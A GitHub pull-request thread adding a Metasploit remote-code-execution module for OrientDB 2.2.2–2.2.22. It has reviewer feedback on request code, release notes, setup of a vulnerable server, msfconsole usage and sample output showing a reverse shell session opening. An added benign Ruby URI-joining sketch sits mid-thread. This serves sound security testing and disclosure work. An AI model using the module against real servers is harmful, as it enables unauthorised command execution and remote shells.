Add OrientDB 2.2.x RCE Module #8736
Conversation
…sted the module against Win7-Pro-x64 with OrientDB v2.2.20 with StagerCmd flavors vbs and certutil with success
items.each do |item|
  request_parameters = {
    'method' => 'POST',
    'uri' => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20?format=rid,type,version,class,graph"),
Use vars_get rather than appending the query string to the URL.
Now using vars_get on all requests.
def exploit
  @uri = target_uri
  @uri.path = normalize_uri(@uri.path)
  @uri.path << "/" if @uri.path[-1, 1] != "/"
If you're using normalize_uri then in theory you shouldn't need to do this check for / as normalize_uri will take care of formatting the URL for you. For example, {'uri' => normalize_uri(target_uri.path, 'listDatabases')}
Removed redundant uri normalization checking
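As an added illustration of the review point above (not Metasploit's own normalize_uri or vars_get, which live in the framework's HTTP client mixin), a stand-alone Ruby sketch: join_uri_path is an assumed stand-in for normalize_uri, and the query string travels as a hash the way vars_get carries it, which is why the hand-written trailing "/" check becomes redundant.

```ruby
require 'uri'

# Assumed stand-in for normalize_uri (not the framework's implementation):
# join the segments with "/", guarantee a leading "/", and collapse any
# doubled slashes that come from segments which already carry their own.
def join_uri_path(*parts)
  joined = parts.compact.map(&:to_s).join('/')
  joined = '/' + joined unless joined.start_with?('/')
  joined.gsub(%r{/+}, '/')
end

# Build the request the way the review asks for: the path from joined
# segments, the query string as a structured hash instead of being
# appended to the URI by hand. targetdb is a caller-supplied database name.
def build_request(base_path, targetdb)
  {
    'method'   => 'POST',
    'uri'      => join_uri_path(base_path, 'command', targetdb, 'sql', '-', '20'),
    'vars_get' => { 'format' => 'rid,type,version,class,graph' }
  }
end

# Render the request as it would appear on the wire, showing that the
# structured query gets URL-encoded (commas become %2C) when serialised.
def rendered_url(req)
  "#{req['uri']}?#{URI.encode_www_form(req['vars_get'])}"
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: a base path with and without a trailing slash.
  puts join_uri_path('/', 'listDatabases')
  puts join_uri_path('/orient/', '/listDatabases')
  puts rendered_url(build_request('/', 'testdb'))
end
```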
uri = target_uri
uri.path = normalize_uri(uri.path)
uri.path << "/" if uri.path[-1, 1] != "/"
res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
Is there a reason you're using send_request_raw rather than send_request_cgi? The latter is preferred.
I was having issues with the URL encoding. The exploit didn't work because of this. The "encode_params" resolved the issue and every request is now using send_request_cgi
…redundant uri normalization checking; Swapped send_request_raw for send_request_cgi; using vars_get;
Unfortunately this didn't work for me on Windows 7. Here's some output, printing the response from step 2 in
…iting windows boxes
Yeah I really need to use send_request_raw. The send_request_cgi encoding breaks the HTTP requests somehow for windows boxes. Using send_request_raw the exploit works on both linux and windows.
Did you spot any more issues with the execution of the module?
@ricardojba i'll see if i can take a look at this today
Worked for me
...snip...
Just a heads up that i did some ninja patching to the documentation since this had been in the queue for so long. See here: e7aa06c#diff-a2827c36764dd349af0d4cbb8ba31623 Thanks for the patience!
Release Notes
This module adds a remote code execution exploit for OrientDB's web interface.
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.2 up to 2.2.22 should be vulnerable.
The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
Vulnerable Application
OrientDB 2.2.2 <= 2.2.22
Installation
Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
$ wget -O orientdb-community-2.2.20.zip 'http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi'
$ unzip orientdb-community-2.2.20.zip
$ cd orientdb-community-2.2.20
$ chmod 755 bin/*.sh
$ chmod -R 777 config
$ cd bin
$ ./server.sh
References for running OrientDB
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
References for vulnerability
https://blogs.securiteam.com/index.php/archives/3318
http://www.palada.net/index.php/2017/07/13/news-2112/
https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
Verification Steps
msfconsole
use exploit/multi/http/orientdb_exec
set rhost <RHOST>
set target <TARGET_NUMBER>
set workspace <WORKSPACE>
check
run
Example Output
[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run
[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331
[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...
[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100